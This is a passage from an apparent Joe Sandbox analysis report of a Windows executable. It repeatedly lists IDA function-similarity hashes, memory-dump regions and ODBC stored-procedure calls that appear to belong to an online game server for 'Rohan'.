                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [Rohan_InsTElementalWeaponInfo] (?,?,?,?)}
                                                                                      • API String ID: 0-1711410061
                                                                                      • Opcode ID: d877618fb00ce83538e2aa027ad9c30e055c0511809f2b22c4a16715b387f8ad
                                                                                      • Instruction ID: 591ca50722c14c6ba1b8145f04a92ae291fa354581ed0a7202d3c5acdffb3a97
                                                                                      • Opcode Fuzzy Hash: d877618fb00ce83538e2aa027ad9c30e055c0511809f2b22c4a16715b387f8ad
                                                                                      • Instruction Fuzzy Hash: 1B41FFB06803147BEB249B54CC52FEA7374EB84B18F2042C9F7186E6C5D6B56F818B9C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_UpdateSiegeBuilding] (?,?,?,?)},000000FD), ref: 00431237
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00431276
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004312AB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004312E3
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043131B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00431353
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_UpdateSiegeBuilding] (?,?,?,?)}, xrefs: 0043122E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_UpdateSiegeBuilding] (?,?,?,?)}
                                                                                      • API String ID: 0-3098328386
                                                                                      • Opcode ID: cf663b2ddc4f0da2b9c37b5393b21b23c0911b5c8825638828ddceb60b0ea82f
                                                                                      • Instruction ID: 991f7a000d2d76ecf16bcfd66a3f9681b540b452565f9d8c0251188d34e07fed
                                                                                      • Opcode Fuzzy Hash: cf663b2ddc4f0da2b9c37b5393b21b23c0911b5c8825638828ddceb60b0ea82f
                                                                                      • Instruction Fuzzy Hash: 6E41F1B4680214BBEBA49F54CC52F9973B4FB44B18F20C289F7946E2C5DDB169C48B98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN3_AddBankMoney](?,?,?,?) } ,000000FD), ref: 0042B413
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042B452
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042B48A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042B4BF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042B4F7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 0042B52F
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN3_AddBankMoney](?,?,?,?) } , xrefs: 0042B40A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN3_AddBankMoney](?,?,?,?) }
                                                                                      • API String ID: 0-1433483923
                                                                                      • Opcode ID: bc3d52e108a60903ce334e295a9a5b4d29d74cf5e9f626f5c8626edbbfc252e7
                                                                                      • Instruction ID: b8ee2cdfb6487f0b3f6f6296ca47bc4343761459232cbfd6b552c5bfcf8444de
                                                                                      • Opcode Fuzzy Hash: bc3d52e108a60903ce334e295a9a5b4d29d74cf5e9f626f5c8626edbbfc252e7
                                                                                      • Instruction Fuzzy Hash: 6841D2B16443147BEB258B54CD52FAA7379EB84B1CF10828DF7146E2C9D7B16E808B5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SetGameHelper] (?,?,?,?)},000000FD), ref: 00435420
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00435469
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043549E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004354D6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0043550E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FE,000000C8,00000000,?,00000000,000000C8,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043554E
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SetGameHelper] (?,?,?,?)}, xrefs: 00435417
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SetGameHelper] (?,?,?,?)}
                                                                                      • API String ID: 0-1531428334
                                                                                      • Opcode ID: d9f0fab895ea3533f98960c0af6fcb75505065ae118c26c17dca757aa69dc917
                                                                                      • Instruction ID: 33c577b4b75450c77959500be70ed3d8fe306d0015e3d378b6c7bd82b59d5bd3
                                                                                      • Opcode Fuzzy Hash: d9f0fab895ea3533f98960c0af6fcb75505065ae118c26c17dca757aa69dc917
                                                                                      • Instruction Fuzzy Hash: 41413FB1644618BBEB208B44CC52FAA7335EB84B1DF2082C8F6187F2C4D7B56D848F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetConquerorLevel2] (?,?,?,?)},000000FD), ref: 0044158F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004415DB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00441610
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00441648
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00441680
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004416B8
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetConquerorLevel2] (?,?,?,?)}, xrefs: 00441586
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetConquerorLevel2] (?,?,?,?)}
                                                                                      • API String ID: 0-3497704865
                                                                                      • Opcode ID: b609dae2255344a083a38401675f968b9e00be5f80cfd2053dfa53ae24669156
                                                                                      • Instruction ID: e7af38b69fe6f5dd6c26da01527ca1f00000ed34fecf5ae7a0dda3f041e4f1b5
                                                                                      • Opcode Fuzzy Hash: b609dae2255344a083a38401675f968b9e00be5f80cfd2053dfa53ae24669156
                                                                                      • Instruction Fuzzy Hash: 0D4103B5681214BBEB24CB54CC52FEA7375EB44B18F108288F7147E6C5D6B57E408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetAllChar](?,?,?,?)} ,000000FD), ref: 0042BC01
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042BC40
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042BC75
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042BCAD
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042BCE5
                                                                                      • #72.ODBC32(?,00000000,00000004,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042BD1D
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetAllChar](?,?,?,?)} , xrefs: 0042BBF8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetAllChar](?,?,?,?)}
                                                                                      • API String ID: 0-2235531667
                                                                                      • Opcode ID: cc637c2d8e149cd3ce8c03087e7d23a83973512326c42c8ea44c4ba313e26bdb
                                                                                      • Instruction ID: 184ca5e0b8a427d6d9a3300a1d848b1f8b786b15073092587b28e29303d3f26e
                                                                                      • Opcode Fuzzy Hash: cc637c2d8e149cd3ce8c03087e7d23a83973512326c42c8ea44c4ba313e26bdb
                                                                                      • Instruction Fuzzy Hash: AE41F2F1744215BBEB24CF54CC52F9973B8EB88B14F604289F7156E2C6D5B1A9408B5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [Rohan_InsMallItem] (?,?,?,?)},000000FD), ref: 004411B7
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004411F6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0044122E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00441266
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0044129E
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000014,00000000,?,00000015,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004412D6
                                                                                      Strings
                                                                                      • {? = CALL [Rohan_InsMallItem] (?,?,?,?)}, xrefs: 004411AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
